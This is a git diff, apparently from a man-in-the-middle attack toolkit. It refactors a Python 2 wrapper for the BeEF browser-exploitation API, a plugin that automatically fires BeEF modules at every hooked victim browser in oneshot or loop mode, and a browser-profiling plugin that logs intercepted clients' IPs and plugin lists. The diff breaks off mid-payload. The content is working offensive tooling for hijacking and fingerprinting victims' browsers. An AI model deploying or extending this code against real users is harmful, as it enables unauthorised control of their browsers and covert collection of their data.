diff --git a/config_files/beefautorun.cfg b/config_files/beefautorun.cfg index f48760b..fa84f2d 100644 --- a/config_files/beefautorun.cfg +++ b/config_files/beefautorun.cfg @@ -1,6 +1,7 @@ #Example config file for the BeefAutorun plugin -mode = oneshot #can be set to loop, or oneshot +mode = oneshot +#can be set to loop, or oneshot #in loop mode the plugin will run modules on all hooked browsers every 10 seconds #in oneshot mode the plugin will run modules only once per hooked browser diff --git a/libs/beefapi.py b/libs/beefapi.py index 67e1162..099c252 100644 --- a/libs/beefapi.py +++ b/libs/beefapi.py @@ -18,8 +18,7 @@ class BeefAPI: self.log_url = self.url + "logs?token=" def random_url(self): - url = "".join(sample(digits + lowercase, 8)) - return url + return "".join(sample(digits + lowercase, 8)) def login(self, username, password): try: @@ -36,30 +35,67 @@ class BeefAPI: except Exception, e: print "beefapi ERROR: %s" % e - def onlineSessions(self): + def sessions_online(self): return self.get_sessions("online", "session") - def offlineSessions(self): + def sessions_offline(self): return self.get_sessions("offline", "session") - def onlineHosts(self): + def session2host(self, session): + return self.conversion(session, "ip") + + def session2id(self, session): + return self.conversion(session, "id") + + def hook_info(self, hook): #Returns parsed information on a session + session = self.conversion(hook, "session") + url = self.hookurl + self.token + r = requests.get(url).json() + + try: + states = ["online", "offline"] + for state in states: + for v in r["hooked-browsers"][state].items(): + if v[1]["session"] == session: + return v[1] + except IndexError: + pass + + def hook_info_all(self, hook): + session = self.conversion(hook, "session") + url = self.url + "hooks/%s?token=%s" % (session, self.token) + return requests.get(url).json() + + def hook_logs(self, hook): + session = self.conversion(hook, "session") + url = self.url + "logs/%s?token=%s" % (session, self.token) + return requests.get(url).json() + + def hosts_online(self): return self.get_sessions("online", "ip") - def offlineHosts(self): + def hosts_offline(self): return self.get_sessions("offline", "ip") - def get_sessions(self, state, value): - try: - hooks = [] - r = requests.get(self.hookurl + self.token).json() - for v in r["hooked-browsers"][state].items(): - hooks.append(v[1][value]) + def host2session(self, host): + return self.conversion(host, "session") - return hooks - except Exception, e: - print "beefapi ERROR: %s" % e + def host2id(self, host): + return self.conversion(host, "id") - def getModid(self, name): #Returns module id + def ids_online(self): + return self.get_sessions("online", "id") + + def ids_offline(self): + return self.get_sessions("offline", "id") + + def id2session(self, id): + return self.conversion(id, "session") + + def id2host(self, id): + return self.conversion(id, "ip") + + def module_id(self, name): #Returns module id url = self.mod_url + self.token try: r = requests.get(url).json() @@ -69,7 +105,7 @@ class BeefAPI: except Exception, e: print "beefapi ERROR: %s" % e - def getModname(self, id): #Returns module name + def module_name(self, id): #Returns module name url = self.mod_url + self.token try: r = requests.get(url).json() @@ -79,47 +115,9 @@ class BeefAPI: except Exception, e: print "beefapi ERROR: %s" % e - def host2session(self, ip): #IP => Session - url = self.hookurl + self.token - try: - r = requests.get(url).json() - for v in r["hooked-browsers"]["online"].items(): - if v[1]["ip"] == ip: - return v[1]["session"] - else: - session = None - - if session is None: - for v in r["hooked-browsers"]["offline"].items(): - if v[1]["ip"] == ip: - return v[1]["session"] - else: - return None - - except Exception, e: - print "beefapi ERROR: %s" % e - - def session2host(self, session): #Session => IP - url = self.hookurl + self.token - try: - r = requests.get(url).json() - for v in r["hooked-browsers"]["online"].items(): - if v[1]["session"] == session: - return v[1]["ip"] - else: - ip = None - - if ip is None: - for v in r["hooked-browsers"]["offline"].items(): - if v[1]["session"] == session: - return v[1]["ip"] - else: - return None - except Exception, e: - print "beefapi ERROR: %s" % e - - def runModule(self, session, mod_id, options={}): #Executes a module on a specified session + def module_run(self, hook, mod_id, options={}): #Executes a module on a specified session try: + session = self.conversion(hook, "session") headers = {"Content-Type": "application/json", "charset": "UTF-8"} payload = json.dumps(options) url = self.url + "modules/%s/%s?token=%s" % (session, mod_id, self.token) @@ -127,24 +125,45 @@ class BeefAPI: except Exception, e: print "beefapi ERROR: %s" % e - def moduleResult(self, session, mod_id, cmd_id): + def module_results(self, hook, mod_id, cmd_id): + session = self.conversion(hook, "session") url = self.mod_url + "%s/%s/%s?token=%s" % (session, mod_id, cmd_id, self.token) return requests.get(url).json() - def sessionInfo(self, session): #Returns parsed information on a session - url = self.url + "hooks/%s?token=%s" % (session, self.token) + def modules_list(self): + return requests.get(self.mod_url + self.token).json() + + def module_info(self, id): + url = self.url + "modules/%s?token=%s" % (id, self.token) return requests.get(url).json() def logs(self): return requests.get(self.log_url + self.token).json() - def sessionLogs(self, session): - url = self.url + "logs/%s?token=%s" % (session, self.token) - return requests.get(url).json() + def conversion(self, value, return_value): #Helper function for all conversion functions + url = self.hookurl + self.token + try: + r = requests.get(url).json() + states = ["online", "offline"] + for state in states: + for v in r["hooked-browsers"][state].items(): + for r in v[1].values(): + if str(value) == str(r): + return v[1][return_value] - def listModules(self): - return requests.get(self.mod_url + self.token).json() + except Exception, e: + print "beefapi ERROR: %s" % e - def moduleInfo(self, id): - url = self.url + "modules/%s?token=%s" % (id, self.token) - return requests.get(url).json() + except IndexError: + pass + + def get_sessions(self, state, value): #Helper function + try: + hooks = [] + r = requests.get(self.hookurl + self.token).json() + for v in r["hooked-browsers"][state].items(): + hooks.append(v[1][value]) + + return hooks + except Exception, e: + print "beefapi ERROR: %s" % e diff --git a/plugins/BeefAutorun.py b/plugins/BeefAutorun.py index 5df1995..0edbcd9 100644 --- a/plugins/BeefAutorun.py +++ b/plugins/BeefAutorun.py @@ -37,54 +37,51 @@ class BeefAutorun(Plugin): userconfig = ConfigObj(self.autoruncfg) self.Mode = userconfig['mode'] - if self.Mode == 'oneshot': - print '[*] Setting mode to oneshot' - elif self.Mode == 'loop': - print '[*] Setting mode to loop' - else: - sys.exit("[-] Error: unrecognized mode set in config file") self.All_modules = userconfig["ALL"] self.Targeted_modules = userconfig["targets"] - print "[*] BeEFAutorun plugin online" + print "[*] BeEFAutorun plugin online => Mode: %s" % self.Mode t = threading.Thread(name="autorun", target=self.autorun, args=(beef,)) t.setDaemon(True) t.start() def autorun(self, beef): - already_hooked = [] already_ran = [] + already_hooked = [] while True: - sessions = beef.onlineSessions() + sessions = beef.sessions_online() if len(sessions) > 0: for session in sessions: - session_ip = beef.session2host(session) + if session not in already_hooked: - logging.info("%s >> joined the horde!" % session_ip) + info = beef.hook_info(session) + logging.info("%s >> joined the horde! [id:%s, type:%s-%s, os:%s]" % (info['ip'], info['id'], info['name'], info['version'], info['os'])) already_hooked.append(session) if self.Mode == 'oneshot': if session not in already_ran: - self.execModules(session, session_ip, beef) + self.execModules(session, beef) already_ran.append(session) elif self.Mode == 'loop': - self.execModules(session, session_ip, beef) + self.execModules(session, beef) sleep(10) else: sleep(1) - def execModules(self, session, session_ip, beef): - session_browser = beef.sessionInfo(session)["BrowserName"] - session_os = beef.sessionInfo(session)["OsName"] + def execModules(self, session, beef): + session_info = beef.hook_info(session) + session_ip = session_info['ip'] + hook_browser = session_info['name'] + hook_os = session_info['os'] if len(self.All_modules) > 0: logging.info("%s >> sending generic modules" % session_ip) for module, options in self.All_modules.items(): - mod_id = beef.getModid(module) - resp = beef.runModule(session, mod_id, json.loads(options)) + mod_id = beef.module_id(module) + resp = beef.module_run(session, mod_id, json.loads(options)) if resp["success"] == 'true': logging.info('%s >> sent module %s' % (session_ip, mod_id)) else: @@ -93,16 +90,16 @@ class BeefAutorun(Plugin): logging.info("%s >> sending targeted modules" % session_ip) for os in self.Targeted_modules: - if (os in session_os) or (os == session_os): + if (os in hook_os) or (os == hook_os): browsers = self.Targeted_modules[os] if len(browsers) > 0: for browser in browsers: - if browser == session_browser: + if browser == hook_browser: modules = self.Targeted_modules[os][browser] if len(modules) > 0: for module, options in modules.items(): - mod_id = beef.getModid(module) - resp = beef.runModule(session, mod_id, json.loads(options)) + mod_id = beef.module_id(module) + resp = beef.module_run(session, mod_id, json.loads(options)) if resp["success"] == 'true': logging.info('%s >> sent module %s' % (session_ip, mod_id)) else: diff --git a/plugins/BrowserProfiler.py b/plugins/BrowserProfiler.py index 752b77c..d9d4639 100644 --- a/plugins/BrowserProfiler.py +++ b/plugins/BrowserProfiler.py @@ -29,8 +29,10 @@ class BrowserProfiler(Inject, Plugin): if 'clientprfl' in request.uri: self.dic_output = self.post2dict(request.postData) self.dic_output['ip'] = str(request.client.getClientIP()) # add the IP of the client + if self.dic_output['plugin_list'] > 0: + self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',') pretty_output = pformat(self.dic_output) - logging.warning("%s Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output)) + logging.warning("%s >> Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output)) def get_payload(self): payload = """